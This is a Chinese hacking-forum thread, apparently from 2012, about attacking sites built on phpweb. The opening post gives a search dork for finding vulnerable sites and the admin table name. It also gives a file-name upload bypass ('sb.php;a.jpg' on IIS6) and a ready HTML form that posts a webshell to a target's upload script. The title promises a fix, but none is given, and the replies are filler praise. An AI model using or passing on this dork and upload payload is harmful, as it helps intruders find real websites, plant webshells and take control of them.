查看: 2984|回复: 25

phpweb成品网站全版本通杀注入漏洞及修复

[复制链接]
发表于 2012-11-10 02:34:52 | 显示全部楼层 |阅读模式
关键字:inurl:webmall/detail.php?id数据表:pwn_base_admin

关于拿shell

首先登录后台admin.php

看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
<input type="text" name="fileName" value="sb.php;a.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="14" /></td>
<input type="submit" name="button" value="确定" />
</form>

首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
发表于 2014-10-18 05:15:49 | 显示全部楼层
呵呵 哪天得看看 `~~~~  
发表于 2014-10-20 07:35:23 | 显示全部楼层
我不是你想象中的那样完美那样坚强,金钱和美女就足以把我征服!  
发表于 2014-10-27 02:45:36 | 显示全部楼层
好贴坏贴,一眼就看出去  
发表于 2014-11-6 13:47:08 | 显示全部楼层
先看看怎么样!  
发表于 2014-11-18 22:36:21 | 显示全部楼层
呵呵,支持一下哈  
发表于 2014-12-6 17:43:59 | 显示全部楼层
是楼主原创吗  
发表于 2014-12-29 22:14:38 | 显示全部楼层
鉴定完毕.!  
发表于 2015-1-29 22:29:42 | 显示全部楼层
加油啊!!!!顶哦!!!!!支持楼主,支持你~  
发表于 2015-3-4 02:04:45 | 显示全部楼层
小生对楼主之仰慕如滔滔江水连绵不绝,海枯石烂,天崩地裂,永不变心.  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则